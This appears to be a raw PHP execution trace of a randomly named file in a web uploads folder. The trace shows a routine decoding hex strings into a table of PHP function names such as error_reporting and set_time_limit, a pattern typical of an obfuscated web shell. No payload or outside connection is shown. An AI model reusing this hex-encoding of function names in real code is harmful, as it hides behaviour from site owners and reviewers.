3	956	1	0.036885	721640
3	956	R			102
3	957	0	0.036898	721560	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	957	1	0.036909	721600
3	957	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	958	0	0.036940	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	958	1	0.036951	721672
3	958	R			117
3	959	0	0.036963	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	959	1	0.036974	721632
3	959	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	960	0	0.037004	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	960	1	0.037019	721672
3	960	R			110
3	961	0	0.037032	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	961	1	0.037043	721632
3	961	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	962	0	0.037083	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	962	1	0.037095	721672
3	962	R			99
3	963	0	0.037107	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	963	1	0.037117	721632
3	963	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	964	0	0.037148	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	964	1	0.037179	721672
3	964	R			116
3	965	0	0.037194	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	965	1	0.037206	721632
3	965	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	966	0	0.037236	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	966	1	0.037247	721672
3	966	R			105
3	967	0	0.037260	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	967	1	0.037270	721632
3	967	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	968	0	0.037300	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	968	1	0.037311	721672
3	968	R			111
3	969	0	0.037323	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	969	1	0.037335	721632
3	969	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	970	0	0.037365	721624	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	970	1	0.037376	721672
3	970	R			110
3	971	0	0.037389	721592	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	971	1	0.037399	721632
3	971	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	972	0	0.037429	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	972	1	0.037440	721680
3	972	R			95
3	973	0	0.037453	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	973	1	0.037463	721640
3	973	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	974	0	0.037494	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	974	1	0.037505	721680
3	974	R			101
3	975	0	0.037518	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	975	1	0.037529	721640
3	975	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	976	0	0.037559	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	976	1	0.037570	721680
3	976	R			120
3	977	0	0.037583	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	977	1	0.037594	721640
3	977	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	978	0	0.037624	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	978	1	0.037635	721680
3	978	R			105
3	979	0	0.037648	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	979	1	0.037659	721640
3	979	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	980	0	0.037689	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	980	1	0.037700	721680
3	980	R			115
3	981	0	0.037713	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	981	1	0.037724	721640
3	981	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	982	0	0.037754	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	982	1	0.037765	721680
3	982	R			116
3	983	0	0.037781	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	983	1	0.037793	721640
3	983	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	984	0	0.037822	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	984	1	0.037834	721680
3	984	R			115
3	985	0	0.037846	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	985	1	0.037857	721640
3	985	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	955	1	0.037887	721600
2	955	R			'function_exists'
1		A						/var/www/html/uploads/lCT.php	7	$func[49] = 'function_exists'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	986	0	0.037923	721600	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6572726f725f7265706f7274696e67'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 29
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	987	0	0.037965	721632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	987	1	0.037976	721680
3	987	R			101
3	988	0	0.037988	721600	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	988	1	0.037999	721640
3	988	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	989	0	0.038030	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	989	1	0.038041	721712
3	989	R			114
3	990	0	0.038054	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	990	1	0.038065	721672
3	990	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	991	0	0.038095	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	991	1	0.038106	721712
3	991	R			114
3	992	0	0.038118	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	992	1	0.038130	721672
3	992	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	993	0	0.038160	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	993	1	0.038171	721712
3	993	R			111
3	994	0	0.038184	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	994	1	0.038194	721672
3	994	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	995	0	0.038225	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	995	1	0.038236	721712
3	995	R			114
3	996	0	0.038249	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	996	1	0.038260	721672
3	996	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	997	0	0.038289	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	997	1	0.038301	721712
3	997	R			95
3	998	0	0.038313	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	998	1	0.038324	721672
3	998	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	999	0	0.038355	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	999	1	0.038365	721712
3	999	R			114
3	1000	0	0.038386	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1000	1	0.038398	721672
3	1000	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1001	0	0.038429	721664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1001	1	0.038440	721712
3	1001	R			101
3	1002	0	0.038452	721632	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1002	1	0.038463	721672
3	1002	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1003	0	0.038494	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1003	1	0.038506	721720
3	1003	R			112
3	1004	0	0.038523	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1004	1	0.038534	721680
3	1004	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1005	0	0.038564	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1005	1	0.038576	721720
3	1005	R			111
3	1006	0	0.038589	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1006	1	0.038601	721680
3	1006	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1007	0	0.038631	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1007	1	0.038643	721720
3	1007	R			114
3	1008	0	0.038655	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1008	1	0.038667	721680
3	1008	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1009	0	0.038696	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1009	1	0.038707	721720
3	1009	R			116
3	1010	0	0.038720	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1010	1	0.038731	721680
3	1010	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1011	0	0.038761	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1011	1	0.038773	721720
3	1011	R			105
3	1012	0	0.038785	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1012	1	0.038796	721680
3	1012	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1013	0	0.038826	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1013	1	0.038838	721720
3	1013	R			110
3	1014	0	0.038851	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1014	1	0.038862	721680
3	1014	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1015	0	0.038892	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1015	1	0.038903	721720
3	1015	R			103
3	1016	0	0.038916	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1016	1	0.038927	721680
3	1016	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	986	1	0.038957	721640
2	986	R			'error_reporting'
1		A						/var/www/html/uploads/lCT.php	7	$func[50] = 'error_reporting'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1017	0	0.038992	721640	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7365745f74696d655f6c696d6974'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 27
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1018	0	0.039034	721672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1018	1	0.039045	721720
3	1018	R			115
3	1019	0	0.039058	721640	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1019	1	0.039070	721680
3	1019	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1020	0	0.039101	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1020	1	0.039112	721752
3	1020	R			101
3	1021	0	0.039125	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1021	1	0.039136	721712
3	1021	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1022	0	0.039167	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1022	1	0.039178	721752
3	1022	R			116
3	1023	0	0.039191	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1023	1	0.039202	721712
3	1023	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1024	0	0.039233	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1024	1	0.039247	721752
3	1024	R			95
3	1025	0	0.039260	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1025	1	0.039271	721712
3	1025	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1026	0	0.039302	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1026	1	0.039315	721752
3	1026	R			116
3	1027	0	0.039332	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1027	1	0.039346	721712
3	1027	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1028	0	0.039377	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1028	1	0.039388	721752
3	1028	R			105
3	1029	0	0.039401	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1029	1	0.039412	721712
3	1029	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1030	0	0.039442	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1030	1	0.039454	721752
3	1030	R			109
3	1031	0	0.039467	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1031	1	0.039477	721712
3	1031	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1032	0	0.039508	721704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1032	1	0.039519	721752
3	1032	R			101
3	1033	0	0.039531	721672	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1033	1	0.039542	721712
3	1033	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1034	0	0.039572	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1034	1	0.039583	721760
3	1034	R			95
3	1035	0	0.039596	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1035	1	0.039607	721720
3	1035	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1036	0	0.039638	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1036	1	0.039649	721760
3	1036	R			108
3	1037	0	0.039661	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1037	1	0.039672	721720
3	1037	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1038	0	0.039702	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1038	1	0.039714	721760
3	1038	R			105
3	1039	0	0.039727	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1039	1	0.039738	721720
3	1039	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1040	0	0.039768	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1040	1	0.039780	721760
3	1040	R			109
3	1041	0	0.039792	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1041	1	0.039803	721720
3	1041	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1042	0	0.039833	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1042	1	0.039844	721760
3	1042	R			105
3	1043	0	0.039857	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1043	1	0.039868	721720
3	1043	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1044	0	0.039897	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1044	1	0.039908	721760
3	1044	R			116
3	1045	0	0.039921	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1045	1	0.039933	721720
3	1045	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1017	1	0.039963	721680
2	1017	R			'set_time_limit'
1		A						/var/www/html/uploads/lCT.php	7	$func[51] = 'set_time_limit'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1046	0	0.040004	721680	dehex	1		/var/www/html/uploads/lCT.php	7	1	'636c656172737461746361636865'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 27
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1047	0	0.040046	721712	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1047	1	0.040058	721760
3	1047	R			99
3	1048	0	0.040071	721680	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1048	1	0.040083	721720
3	1048	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1049	0	0.040114	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1049	1	0.040126	721792
3	1049	R			108
3	1050	0	0.040139	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1050	1	0.040150	721752
3	1050	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1051	0	0.040180	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1051	1	0.040192	721792
3	1051	R			101
3	1052	0	0.040205	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1052	1	0.040216	721752
3	1052	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1053	0	0.040247	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1053	1	0.040259	721792
3	1053	R			97
3	1054	0	0.040272	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1054	1	0.040283	721752
3	1054	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1055	0	0.040313	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1055	1	0.040325	721792
3	1055	R			114
3	1056	0	0.040338	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1056	1	0.040349	721752
3	1056	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1057	0	0.040380	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1057	1	0.040391	721792
3	1057	R			115
3	1058	0	0.040404	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1058	1	0.040415	721752
3	1058	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1059	0	0.040445	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1059	1	0.040457	721792
3	1059	R			116
3	1060	0	0.040469	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1060	1	0.040480	721752
3	1060	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1061	0	0.040510	721744	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1061	1	0.040522	721792
3	1061	R			97
3	1062	0	0.040534	721712	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1062	1	0.040546	721752
3	1062	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1063	0	0.040577	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1063	1	0.040589	721800
3	1063	R			116
3	1064	0	0.040601	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1064	1	0.040613	721760
3	1064	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1065	0	0.040643	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1065	1	0.040655	721800
3	1065	R			99
3	1066	0	0.040667	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1066	1	0.040678	721760
3	1066	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1067	0	0.040712	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1067	1	0.040724	721800
3	1067	R			97
3	1068	0	0.040736	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1068	1	0.040748	721760
3	1068	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1069	0	0.040778	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1069	1	0.040790	721800
3	1069	R			99
3	1070	0	0.040802	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1070	1	0.040813	721760
3	1070	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1071	0	0.040844	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	1071	1	0.040856	721800
3	1071	R			104
3	1072	0	0.040869	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	1072	1	0.040880	721760
3	1072	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1073	0	0.040910	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1073	1	0.040921	721800
3	1073	R			101
3	1074	0	0.040934	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1074	1	0.040945	721760
3	1074	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1046	1	0.040975	721720
2	1046	R			'clearstatcache'
1		A						/var/www/html/uploads/lCT.php	7	$func[52] = 'clearstatcache'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1075	0	0.041010	721720	dehex	1		/var/www/html/uploads/lCT.php	7	1	'646174655f64656661756c745f74696d657a6f6e655f736574'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 49
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1076	0	0.041054	721752	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1076	1	0.041066	721800
3	1076	R			100
3	1077	0	0.041079	721720	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1077	1	0.041091	721760
3	1077	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1078	0	0.041125	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1078	1	0.041137	721832
3	1078	R			97
3	1079	0	0.041150	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1079	1	0.041163	721792
3	1079	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1080	0	0.041210	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1080	1	0.041222	721832
3	1080	R			116
3	1081	0	0.041235	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1081	1	0.041246	721792
3	1081	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1082	0	0.041277	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1082	1	0.041289	721832
3	1082	R			101
3	1083	0	0.041302	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1083	1	0.041313	721792
3	1083	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1084	0	0.041344	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1084	1	0.041355	721832
3	1084	R			95
3	1085	0	0.041368	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1085	1	0.041379	721792
3	1085	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1086	0	0.041409	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1086	1	0.041421	721832
3	1086	R			100
3	1087	0	0.041434	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1087	1	0.041445	721792
3	1087	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1088	0	0.041481	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1088	1	0.041493	721832
3	1088	R			101
3	1089	0	0.041506	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1089	1	0.041517	721792
3	1089	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1090	0	0.041547	721784	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1090	1	0.041559	721832
3	1090	R			102
3	1091	0	0.041572	721752	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1091	1	0.041582	721792
3	1091	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1092	0	0.041613	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1092	1	0.041624	721840
3	1092	R			97
3	1093	0	0.041637	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1093	1	0.041649	721800
3	1093	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1094	0	0.041686	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1094	1	0.041701	721840
3	1094	R			117
3	1095	0	0.041719	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1095	1	0.041735	721800
3	1095	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1096	0	0.041773	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1096	1	0.041785	721840
3	1096	R			108
3	1097	0	0.041798	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1097	1	0.041809	721800
3	1097	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1098	0	0.041839	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1098	1	0.041853	721840
3	1098	R			116
3	1099	0	0.041870	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1099	1	0.041884	721800
3	1099	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1100	0	0.041947	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1100	1	0.041969	721840
3	1100	R			95
3	1101	0	0.041995	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1101	1	0.042018	721800
3	1101	R			'_'
